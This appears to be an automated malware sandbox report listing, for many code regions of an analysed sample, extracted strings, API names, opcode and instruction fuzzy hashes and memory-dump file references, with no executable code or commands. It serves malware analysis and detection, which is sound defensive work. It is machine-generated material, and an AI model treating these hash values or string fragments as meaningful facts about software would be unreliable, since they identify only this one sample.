                                                                        • String ID: `$c
                                                                        • API String ID: 0-1220095849
                                                                        • Opcode ID: 5c608a1e2e721dabdcaeeddb8a4bb7f1cc7d9f0b7b683d9c8b8af8142caded02
                                                                        • Instruction ID: 111524246ac2692b802eec761924c83444088643054ece3246dee7070d8dcbdc
                                                                        • Opcode Fuzzy Hash: 5c608a1e2e721dabdcaeeddb8a4bb7f1cc7d9f0b7b683d9c8b8af8142caded02
                                                                        • Instruction Fuzzy Hash: 58D1F571608760ABD7049F24D841BAFBBE6DBD6310F18882DF88497381D735DE0A8B97
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: bBd$rBd
                                                                        • API String ID: 0-1607660745
                                                                        • Opcode ID: e506f9f041fe22708fe3ecfc467c8515e417ca86ef550ee32bd0bd1cc9a4b878
                                                                        • Instruction ID: 03d8516af8d1d55409ff14f172b2ff33db0235e35e2be73efc8ff5117313d3af
                                                                        • Opcode Fuzzy Hash: e506f9f041fe22708fe3ecfc467c8515e417ca86ef550ee32bd0bd1cc9a4b878
                                                                        • Instruction Fuzzy Hash: 66C1F136A08211CFCB08CF68D8912AEBBF2FF8A314F19947DE589A7341D7359905CB91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Inf$NaN
                                                                        • API String ID: 0-3500518849
                                                                        • Opcode ID: b0e2b2875c401f6cab5722d72336aca424ee80348b0bee9137c99bdb03c7602b
                                                                        • Instruction ID: ebdaf4abdd15f1219e941cac76d0cd29eb7dbfa562fe70c48dc77aca2521a570
                                                                        • Opcode Fuzzy Hash: b0e2b2875c401f6cab5722d72336aca424ee80348b0bee9137c99bdb03c7602b
                                                                        • Instruction Fuzzy Hash: 6ED1D571A083119BC708CF28C98165BBBEAEFC4751F158A2DF899973D0E771DD458B82
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: %*+($%*+(
                                                                        • API String ID: 2994545307-3039692684
                                                                        • Opcode ID: a34962b7977193f097f64f6b72c9583fed7c9de0abc4947e0554f8cd6225df13
                                                                        • Instruction ID: 4438868c273680b8213a1ef92dcdb67b54f07c5f9ac2d6ab324317b8a497e57f
                                                                        • Opcode Fuzzy Hash: a34962b7977193f097f64f6b72c9583fed7c9de0abc4947e0554f8cd6225df13
                                                                        • Instruction Fuzzy Hash: 86A106716083129BE738CB25CC91BABB7D3EF88314FA4893DF995D7391EA3099418752
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 5L$_]
                                                                        • API String ID: 0-2033130362
                                                                        • Opcode ID: 18848e014c414f46339eae7cae47e777007bf235a82af264badc863ec1404d96
                                                                        • Instruction ID: 2ea3a38f58f8cc543eeeba8924460e62512f3075050124aba70d410ff7b6009a
                                                                        • Opcode Fuzzy Hash: 18848e014c414f46339eae7cae47e777007bf235a82af264badc863ec1404d96
                                                                        • Instruction Fuzzy Hash: 6AB1E176A18B22CBC324DF28D4901AAB3F3FFD4750F19892CD4855B754E7359906CBA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0123456789ABCDEFXP$0123456789abcdefxp
                                                                        • API String ID: 0-595753566
                                                                        • Opcode ID: 633ecbb3686795a77f77e7aa77a7e6b32be11f1b384751494c357ddb23636c53
                                                                        • Instruction ID: e674778e90e03255b0226350a42ade489ae1b5e8f1fd1a733c8e71bb75663a99
                                                                        • Opcode Fuzzy Hash: 633ecbb3686795a77f77e7aa77a7e6b32be11f1b384751494c357ddb23636c53
                                                                        • Instruction Fuzzy Hash: 7AA19D31A4C3828BD71CCE24C0A83ABBBE2AF96304F14896DE4D55B3D1D7759D49CB82
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$8
                                                                        • API String ID: 0-46163386
                                                                        • Opcode ID: f4d6ea1ab6121c494833b15fa3a62cdebf035ae0e5cfa88c28159ab1c560c224
                                                                        • Instruction ID: 4252c90efacc9501d7e84ae7239f9a81e7dee1d9fb1fea12c20877d8d3d972ed
                                                                        • Opcode Fuzzy Hash: f4d6ea1ab6121c494833b15fa3a62cdebf035ae0e5cfa88c28159ab1c560c224
                                                                        • Instruction Fuzzy Hash: E0C14635209380EFD7158F68C840B9FBBE2BF89354F04891DF988972A2C375D958DB62
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Noni$f[zU
                                                                        • API String ID: 0-2312422219
                                                                        • Opcode ID: bd45893ee66c9f33cfc2386ec84fabfeab1d06185777511a874e0768e411713b
                                                                        • Instruction ID: ffb2999c8a085f000d0819c3dc870bb46f74c9d3fd56dc5de6c80fcb4f9c07e6
                                                                        • Opcode Fuzzy Hash: bd45893ee66c9f33cfc2386ec84fabfeab1d06185777511a874e0768e411713b
                                                                        • Instruction Fuzzy Hash: AD91ABB41443008BEB68CF64C9917667BB2FF56700F18959CDA460F7AAD776D882CB84
                                                                        Strings
                                                                        • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00635112
                                                                        • 0, xrefs: 006350DF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
                                                                        • API String ID: 0-1850561919
                                                                        • Opcode ID: 74263799852f62ad24dd3100feb2444c7c179d45040e096b105daaff40f7c4a3
                                                                        • Instruction ID: acb09cd21aa117958da6a30ab3391ed92862db16b406fc4101fa596f04ba2613
                                                                        • Opcode Fuzzy Hash: 74263799852f62ad24dd3100feb2444c7c179d45040e096b105daaff40f7c4a3
                                                                        • Instruction Fuzzy Hash: AE810537A09D9147CB198D3C9C513BA6A935B97330F3E83A9D9B39B3D5C625880683D1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .+om$p
                                                                        • API String ID: 0-196899376
                                                                        • Opcode ID: 2b2007da8f7a27d27cf5d215239113bf18e4ebe7663c529aecfbbad40ea450a0
                                                                        • Instruction ID: 8d5b6bcd9995427bf5708796d61e12e1be8416b25c35c67a25bb0bcf26cfbc31
                                                                        • Opcode Fuzzy Hash: 2b2007da8f7a27d27cf5d215239113bf18e4ebe7663c529aecfbbad40ea450a0
                                                                        • Instruction Fuzzy Hash: 97714EF7A082049FE310AE2DDC9572AF7D6EBD8320F26853DE6D4C7384E9795C058686
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: bBd$rBd
                                                                        • API String ID: 0-1607660745
                                                                        • Opcode ID: eb1ccb1dc62c84d610356c48ebe12bac9d7059230f76fa2dcb9c7f466b0ef048
                                                                        • Instruction ID: 0201f3db034255c76e543c6ad41438c472226073615fc5adb0b8b9f567c3bc06
                                                                        • Opcode Fuzzy Hash: eb1ccb1dc62c84d610356c48ebe12bac9d7059230f76fa2dcb9c7f466b0ef048
                                                                        • Instruction Fuzzy Hash: F251DD36608351CFC344CF38E88065AB7E2FB8A314F59896CE889C7340E735A949CB52
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: J_4
                                                                        • API String ID: 0-1895515547
                                                                        • Opcode ID: 5a4988c81a63d9f227df804179b9a76adc8c26b40ee5f2d5d8d5d06c399d2d62
                                                                        • Instruction ID: 1054742062be3fa0430a97082819a458fe6b80b9da8f716a9be333164eb312f6
                                                                        • Opcode Fuzzy Hash: 5a4988c81a63d9f227df804179b9a76adc8c26b40ee5f2d5d8d5d06c399d2d62
                                                                        • Instruction Fuzzy Hash: 734226F3A0C2005FE308AE2DEC4567AB7DAEFC4320F26863DEAC4C7744E97558458696
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: _a c
                                                                        • API String ID: 0-3120592319
                                                                        • Opcode ID: d3dd37f1b7fa1317cabd6118df156a4da2ac2701b12d3806ff7c525a02a754e9
                                                                        • Instruction ID: 958e48eae023d25878bb32167dfe852b2fdc2748d5f8f0d09ed223189b5f2e0f
                                                                        • Opcode Fuzzy Hash: d3dd37f1b7fa1317cabd6118df156a4da2ac2701b12d3806ff7c525a02a754e9
                                                                        • Instruction Fuzzy Hash: CE12B0B4600B009BD724DF39C9827A37BF6FF46314F184A1DE89A8B791E734A445CB92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %1.17g
                                                                        • API String ID: 0-1551345525
                                                                        • Opcode ID: c4ad03883f95c43b752fa1c7c5f28a283947dce0d997c5f62ada476233222df8
                                                                        • Instruction ID: ad2b9d9567b5cff4714edd757036db1165db8177bbc16028a8bee63c4636fa3b
                                                                        • Opcode Fuzzy Hash: c4ad03883f95c43b752fa1c7c5f28a283947dce0d997c5f62ada476233222df8
                                                                        • Instruction Fuzzy Hash: 0F12B271A48B418BE72D8E18888436BB7E3AFA1314F19856DE89B4B3D1E7B1DC45CB41
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000003.2155487590.0000000001021000.00000004.00000020.00020000.00000000.sdmp, Offset: 01021000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_3_1021000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: w
                                                                        • API String ID: 0-476252946
                                                                        • Opcode ID: 23c012ea00205686d45e2df2eed82e3288b892b7440c68eb0d0424467c355a18
                                                                        • Instruction ID: db72a9d629748dd392ee88e4063f42861e136686938b6f8e0543742c149719c1
                                                                        • Opcode Fuzzy Hash: 23c012ea00205686d45e2df2eed82e3288b892b7440c68eb0d0424467c355a18
                                                                        • Instruction Fuzzy Hash: 1522096148E3D29FC7138B708CB5695BFB0AE13114B2E89DBC4C1CE4A3D25D599ADB23
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000003.2155487590.0000000001021000.00000004.00000020.00020000.00000000.sdmp, Offset: 01023000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_3_1021000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: w
                                                                        • API String ID: 0-476252946
                                                                        • Opcode ID: 23c012ea00205686d45e2df2eed82e3288b892b7440c68eb0d0424467c355a18
                                                                        • Instruction ID: db72a9d629748dd392ee88e4063f42861e136686938b6f8e0543742c149719c1
                                                                        • Opcode Fuzzy Hash: 23c012ea00205686d45e2df2eed82e3288b892b7440c68eb0d0424467c355a18
                                                                        • Instruction Fuzzy Hash: 1522096148E3D29FC7138B708CB5695BFB0AE13114B2E89DBC4C1CE4A3D25D599ADB23
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Y!
                                                                        • API String ID: 0-2222236823
                                                                        • Opcode ID: 4c7456fb7205e15df122b7732f563ee94363894badad2e32525aceb7f673440a
                                                                        • Instruction ID: 67ef59102cc3e99d77648c210c818b1aec4db086bc8ba0803240fa5fc683cc1d
                                                                        • Opcode Fuzzy Hash: 4c7456fb7205e15df122b7732f563ee94363894badad2e32525aceb7f673440a
                                                                        • Instruction Fuzzy Hash: 63C14772A086214BD718DB24DC526ABB7E2EF91324F08852DF8C597391E734DD058B52
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "
                                                                        • API String ID: 0-123907689
                                                                        • Opcode ID: 07a68b65afc1f8c2f0352e68ae02b44972fd835b148217e58b0b56862b6ef539
                                                                        • Instruction ID: 5f8fd64dfd2f39eb884984a02e14b9a909f65a61c95392fb0ba9e6efcd733a4b
                                                                        • Opcode Fuzzy Hash: 07a68b65afc1f8c2f0352e68ae02b44972fd835b148217e58b0b56862b6ef539
                                                                        • Instruction Fuzzy Hash: BCD108B2A08B209FD714CF24D495BABB7E7AF84350F19893DE88587382E735DD448B91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: _a1c
                                                                        • API String ID: 0-3923334831
                                                                        • Opcode ID: c792f00bf708aabe34c4330aeb330a316da01a708137d55882b9df31b7b8bc9d
                                                                        • Instruction ID: 4fbe20330b9ede1a6d04742d78da920fa524732625de9b5489b1d4300dc78ac4
                                                                        • Opcode Fuzzy Hash: c792f00bf708aabe34c4330aeb330a316da01a708137d55882b9df31b7b8bc9d
                                                                        • Instruction Fuzzy Hash: 6AC11EB55093218BC310CF24D8917ABBBF2EFE6754F188A1CE4C45B3A5E7798942CB46
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8977
                                                                        • API String ID: 0-400282742
                                                                        • Opcode ID: 88c4f3c6b5e21522ea5d632c9732a3dceb5e507f10859497acac6c94e72412cd
                                                                        • Instruction ID: 2886c7f2a59ac68d3c6f630598255810a2d31d3b77c7173637786d1ed62284d6
                                                                        • Opcode Fuzzy Hash: 88c4f3c6b5e21522ea5d632c9732a3dceb5e507f10859497acac6c94e72412cd
                                                                        • Instruction Fuzzy Hash: 28A13572A043125BE724DF28CC9176BB7E6DFC4714F98492CF99593392EA34EC058792
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,
                                                                        • API String ID: 0-3772416878
                                                                        • Opcode ID: b5b1a23a17b65a395a39a0a87458784a8b35cd9fa1a1cb62deed0e3463749841
                                                                        • Instruction ID: d0b2e28992c24f3d48a2c221e9df7b1310e1710032ec6b983cbb2e4273301964
                                                                        • Opcode Fuzzy Hash: b5b1a23a17b65a395a39a0a87458784a8b35cd9fa1a1cb62deed0e3463749841
                                                                        • Instruction Fuzzy Hash: 17B149712083819FC325CF58C98065BFBE1AFA9704F448E2DE5D997382D631E918CBA7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `*g>
                                                                        • API String ID: 0-3294956514
                                                                        • Opcode ID: 7e418b6cfc6fe34439661e023f03e87653115645204721391115b01858992cfe
                                                                        • Instruction ID: e781a846ede668b01006ce3e80556ce523fcb7c2a1350aac193141b2e74b198d
                                                                        • Opcode Fuzzy Hash: 7e418b6cfc6fe34439661e023f03e87653115645204721391115b01858992cfe
                                                                        • Instruction Fuzzy Hash: 788124F3A082148FF304AE2EDC8577AF7D6EBD4321F1A893DD6C483784E97958068656
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: InA>
                                                                        • API String ID: 2994545307-2903657838
                                                                        • Opcode ID: d38d33e3ef193ae79518042bf3a3e354523fc185dd8beabc73cf9574c62599f8
                                                                        • Instruction ID: 737fc728ef323c17792632749c39dd0e3166a03d82d0fda880975488ecf8db97
                                                                        • Opcode Fuzzy Hash: d38d33e3ef193ae79518042bf3a3e354523fc185dd8beabc73cf9574c62599f8
                                                                        • Instruction Fuzzy Hash: D0611571B483059BD724DF69CC84B6AB7E3AFC8310F24853CE999873A6E631DD068791
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8977
                                                                        • API String ID: 0-400282742
                                                                        • Opcode ID: fb0d06e9ad9942a39dcdadb4fe75b082109d927adf36d7d8fa6b3810b71effe2
                                                                        • Instruction ID: 9c68afb23e5e685f05fcdbaeecb2f6e4c2ae232a55381189b30157d9ac009c6a
                                                                        • Opcode Fuzzy Hash: fb0d06e9ad9942a39dcdadb4fe75b082109d927adf36d7d8fa6b3810b71effe2
                                                                        • Instruction Fuzzy Hash: 77515C327043165BD7189E299CA176A7793FBC5720F69863CF9959B3D1DA30AD428380
                                                                        Strings
                                                                        • 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 0060E12B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081
                                                                        • API String ID: 0-2471034898
                                                                        • Opcode ID: c8479c15b9ed3c2452bd64d4b8ed3af8453310a703de923b83e88fc50487e44e
                                                                        • Instruction ID: 710e2345e0d1804a476a6fef0fc2b8f4ac774a2db6c51fc73a646bdc07a6ec86
                                                                        • Opcode Fuzzy Hash: c8479c15b9ed3c2452bd64d4b8ed3af8453310a703de923b83e88fc50487e44e
                                                                        • Instruction Fuzzy Hash: B3513637E999B14BC7188D7C4C012AA6A531BD3330B2EC7A6EDB19B3D5C67B8C124391
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: X$/
                                                                        • API String ID: 0-1692021601
                                                                        • Opcode ID: 7fe8e77f7e425fcabc1b26ef33cc151039993fe274909c18a53cf83962ffda29
                                                                        • Instruction ID: 06483e0728c3a88d2012294335fd01fce8210d60e55642c93006dd1c0c6460be
                                                                        • Opcode Fuzzy Hash: 7fe8e77f7e425fcabc1b26ef33cc151039993fe274909c18a53cf83962ffda29
                                                                        • Instruction Fuzzy Hash: 915153B3A0C7149BE308AE29DD8177BB7E9EB94720F16862EE1C5C7340EA7548418796
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: >ebg
                                                                        • API String ID: 0-4222723227
                                                                        • Opcode ID: 2f73533800725220e268f9f31ad0a8667ddeec145089d2f9553ae5761384776e
                                                                        • Instruction ID: 2e1f88519db5fbd47d3217d980a15ea48f6fcdca73a85101edd9a384c0f4654e
                                                                        • Opcode Fuzzy Hash: 2f73533800725220e268f9f31ad0a8667ddeec145089d2f9553ae5761384776e
                                                                        • Instruction Fuzzy Hash: 7A518B31958B618FC3208BA998802A7B7D3DF96350F09866CD5910B3D6D3B5CD49DB93
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: {E~
                                                                        • API String ID: 0-3875335957
                                                                        • Opcode ID: fcbc383045cd015ae4f5d5f6099ebfc00322cbc43a259a4788426d05092ec995
                                                                        • Instruction ID: 0c1a14031a57b5e745a599d8cc1b466a0929f63f4be683b0f08d3e5d0afd4ae5
                                                                        • Opcode Fuzzy Hash: fcbc383045cd015ae4f5d5f6099ebfc00322cbc43a259a4788426d05092ec995
                                                                        • Instruction Fuzzy Hash: 7D4128B3A191004BF748AD3DED1976BBAD6EBC4320F2B863DDA95877C4E83558064285
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 45
                                                                        • API String ID: 0-2889884971
                                                                        • Opcode ID: 9a38aacda89e4e553a08be06a31d5f3049bb69177b524d2b3589447f37d947e2
                                                                        • Instruction ID: bd84a931a3b2618d7830ccbb59901f1695af0d8f81d64e1dbf2488b782aca66a
                                                                        • Opcode Fuzzy Hash: 9a38aacda89e4e553a08be06a31d5f3049bb69177b524d2b3589447f37d947e2
                                                                        • Instruction Fuzzy Hash: 9541AC76A48340CBE3209F25EC41BDBB7AAEBC6305F00947DFA489B281D73594098F85
                                                                        Memory Dump Source
